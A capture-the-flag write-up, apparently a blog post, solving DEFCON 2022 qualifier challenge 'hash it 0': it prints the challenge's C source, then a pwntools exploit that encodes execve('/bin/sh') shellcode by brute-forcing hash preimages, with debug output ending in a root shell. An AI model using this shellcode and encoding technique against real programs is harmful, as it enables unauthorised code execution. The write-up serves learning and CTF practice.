<p>shellcoding using hash functions!</p><h1>hash it 0</h1><p>The hash-it-0 challenge is from DEFCON’s 2022 qualification round. It is like a normal shellcoding challenge but with <em>mild steroids</em>…</p><p>The challenge involves shellcoding and we need to encode the shellcode for the target program to process and execute.</p><h2>Analysis</h2><p>The challenge involves single binary called main.c:</p><pre><code>#include &lt;arpa/inet.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;stdint.h&gt;
#include &lt;string.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;unistd.h&gt;

#include &lt;openssl/evp.h&gt;

#define ALARM_SECONDS 10

void be_a_ctf_challenge()
{
    alarm(ALARM_SECONDS);
}

typedef const EVP_MD *(*hash_algo_t)(void);

hash_algo_t HASH_ALGOS[] = {
    EVP_md5,
    EVP_sha1,
    EVP_sha256,
    EVP_sha512};

int hash_byte(
    uint8_t input_byte_0,
    uint8_t input_byte_1,
    uint8_t *output_byte,
    const EVP_MD *(*evp_md)(void))
{
    EVP_MD_CTX *mdctx;

    uint8_t input[2];
    input[0] = input_byte_0;
    input[1] = input_byte_1;

    if ((mdctx = EVP_MD_CTX_new()) == NULL)
    {
        return -1;
    }

    if (1 != EVP_DigestInit_ex(mdctx, evp_md(), NULL))
    {
        return -1;
    }

    if (1 != EVP_DigestUpdate(mdctx, input, 2))
    {
        return -1;
    }

    uint8_t *digest = malloc(EVP_MD_size(evp_md()));

    if (digest == NULL)
    {
        return -1;
    }

    unsigned int digest_len = 0;
    if (1 != EVP_DigestFinal_ex(mdctx, digest, &amp;digest_len))
    {
        return -1;
    }

    EVP_MD_CTX_free(mdctx);

    *output_byte = digest[0];

    free(digest);

    return 0;
}

int read_all(FILE *fh, void *buf, size_t len)
{
    uint8_t *b8 = (uint8_t *)buf;
    size_t bytes_read = 0;
    while (bytes_read &lt; len)
    {
        int r = fread(&amp;b8[bytes_read], 1, len - bytes_read, fh);
        if (r &lt;= 0)
        {
            return -1;
        }
        bytes_read += r;
    }
    return 0;
}

int main(int argc, char *argv)
{
    be_a_ctf_challenge();

    uint32_t shellcode_len = 0;
    if (read_all(stdin, &amp;shellcode_len, sizeof(uint32_t)))
    {
        return -1;
    }

    shellcode_len = ntohl(shellcode_len);

    uint8_t *shellcode_mem = malloc(shellcode_len);
    if (shellcode_mem == NULL)
    {
        return -1;
    }

    if (read_all(stdin, shellcode_mem, shellcode_len))
    {
        return -1;
    }

    unsigned int i;
    for (i = 0; i &lt; shellcode_len; i += 2)
    {
        uint8_t new_byte;
        if (hash_byte(shellcode_mem[i],
                      shellcode_mem[i + 1],
                      &amp;new_byte,
                      HASH_ALGOS[(i &gt;&gt; 1) % 4]))
        {
            return -1;
        }
        shellcode_mem[i / 2] = new_byte;
    }

    /* If they can't figure out shellcode_len needs to be page-aligned that's
       their problem. */
    void *mem = mmap(0,
                     shellcode_len / 2,
                     PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS,
                     -1,
                     0);

    memcpy(mem, shellcode_mem, shellcode_len / 2);

    ((void (*)())mem)();

    return 0;
}
</code></pre><p>The program reads in length of the shellcode, and reads shellcode to the length given.</p><h3>Notes</h3><ul><li><p><code>read_all</code> seems to be secure.</p></li><li><p><code>shellcode_len</code> gets converted into little-endian <strong>from</strong> big-endian.</p></li><li><p><code>mmap</code> will allocate a page and will use it to run the shellcode.</p></li></ul><p>Back to main.c :leftwards_arrow_with_hook: We’re mostly interested in <code>hash_byte</code>, since it will process the user input and create a new shellcode to execute.</p><p>Observing <code>hash_byte</code> suggests that it will take in two bytes and create a single output byte. It will choose one of four hash algorithms from:</p><pre><code>hash_algo_t HASH_ALGOS[] = {
    EVP_md5,
    EVP_sha1,
    EVP_sha256,
    EVP_sha512};
</code></pre><p>based on the current index- and this is circular, meaning the first two bytes will be processed by MD5, the second SHA-1, the third SHA-256, the fourth SHA-512, and back to MD5.</p><h3>Planning</h3><p>We could only create an encoded shellcode where each two bytes, when digested by hash, corresponds to each byte of the actual shellcode and send it.</p><p>This can be achieved by:</p><ul><li><p>writing the shellcode</p></li><li><p>brute force 2-byte input for hash to match each byte of shellcode</p></li><li><p>construct &amp; send the encoded payload</p></li></ul><h2>Exploit</h2><p>A Python exploit that reciprocates the above plan can be written as:</p><pre><code>#!/usr/bin/python3
from pwn import *
import hashlib

context.log_level='debug'
context.arch='amd64'
# context.terminal = ['tmux', 'splitw', '-h', '-F' '#{pane_pid}', '-P']

ru 		= lambda a: 	p.readuntil(a)
r 		= lambda n:		p.read(n)
sla 	= lambda a,b: 	p.sendlineafter(a,b)
sa 		= lambda a,b: 	p.sendafter(a,b)
sl		= lambda a: 	p.sendline(a)
s 		= lambda a: 	p.send(a)

sc = asm(f'''
lea rdi, [rip+binsh]
xor rdx, rdx
xor rsi, rsi
mov eax, 59
syscall
binsh: .asciz "/bin/sh"
''')

payload = b''
for i, c in enumerate(sc):
    for j in range(2**16): # brute force 2 bytes
        if i % 4 == 0: m = hashlib.md5() # initialize everytime!!!
        elif i % 4 == 1: m = hashlib.sha1()
        elif i % 4 == 2: m = hashlib.sha256()
        elif i % 4 == 3: m = hashlib.sha512()
        m.update(p16(j)) # 2 byte input
        if m.digest()[0] == c: # match found
            payload += p16(j)
            break
    else: 
        log.critical("Hash crack fail") # after all iterations
        exit()

log.info("length: "+str(len(payload)))

p=process('./challenge')

s(p32(len(payload))[::-1]) # big endian
# gdb.attach(p)
sleep(1.0)
s(payload)

p.interactive()
</code></pre><blockquote><p>I didn’t know I had to initialize hash function everytime before using it, but now I do.</p></blockquote><p>result:</p><pre><code>&gt; # ./exp.py
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python3.10/dist-packages/pwnlib/data/includes /dev/stdin
[DEBUG] Assembling
    .section .shellcode,"awx"
    .global _start
    .global __start
    .p2align 2
    _start:
    __start:
    .intel_syntax noprefix
    lea rdi, [rip+binsh]
    xor rdx, rdx
    xor rsi, rsi
    mov eax, 59
    syscall
    binsh: .asciz "/bin/sh"
[DEBUG] /usr/bin/x86_64-linux-gnu-as -64 -o /tmp/pwn-asm-zrc6ejvk/step2 /tmp/pwn-asm-zrc6ejvk/step1
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-zrc6ejvk/step3 /tmp/pwn-asm-zrc6ejvk/step4
[*] length: 56
[+] Starting local process './challenge' argv=[b'./challenge'] : pid 2656
[DEBUG] Sent 0x4 bytes:
    00000000  00 00 00 38                                         │···8│
    00000004
[DEBUG] Sent 0x38 bytes:
    00000000  6a 01 26 00  8c 00 f3 00  71 00 0a 00  17 00 33 02  │j·&amp;·│····│q···│··3·│
    00000010  5d 00 f4 00  6e 00 f4 01  55 00 2d 01  c7 00 81 02  │]···│n···│U·-·│····│
    00000020  71 00 0a 00  62 01 0e 00  c2 00 80 00  11 03 5b 01  │q···│b···│····│··[·│
    00000030  c2 00 3f 00  d0 00 81 02                            │··?·│····│
    00000038
[*] Switching to interactive mode
$ id
[DEBUG] Sent 0x3 bytes:
    b'id\n'
[DEBUG] Received 0x34 bytes:
    b'uid=0(root) gid=0(root)
</code></pre><div class="captioned-image-container"><figure><a class="image-link is-viewable-img image2" target="_blank" href="https://substackcdn.com/image/fetch/f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40df2203-bec7-49e1-91ca-0f287fc841ee.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40df2203-bec7-49e1-91ca-0f287fc841ee.heic 424w, https://substackcdn.com/image/fetch/w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40df2203-bec7-49e1-91ca-0f287fc841ee.heic 848w, https://substackcdn.com/image/fetch/w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40df2203-bec7-49e1-91ca-0f287fc841ee.heic 1272w, https://substackcdn.com/image/fetch/w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40df2203-bec7-49e1-91ca-0f287fc841ee.heic 1456w" sizes="100vw"><img src="https://substack-post-media.s3.amazonaws.com/public/images/40df2203-bec7-49e1-91ca-0f287fc841ee.heic" width="1000" height="600" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/40df2203-bec7-49e1-91ca-0f287fc841ee.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:600,&quot;width&quot;:1000,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:9042,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40df2203-bec7-49e1-91ca-0f287fc841ee.heic 424w, https://substackcdn.com/image/fetch/w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40df2203-bec7-49e1-91ca-0f287fc841ee.heic 848w, https://substackcdn.com/image/fetch/w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40df2203-bec7-49e1-91ca-0f287fc841ee.heic 1272w, https://substackcdn.com/image/fetch/w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40df2203-bec7-49e1-91ca-0f287fc841ee.heic 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="#FFFFFF" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 "><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></div></div></a></figure></div><p></p><p>Thanks,</p><p>079</p>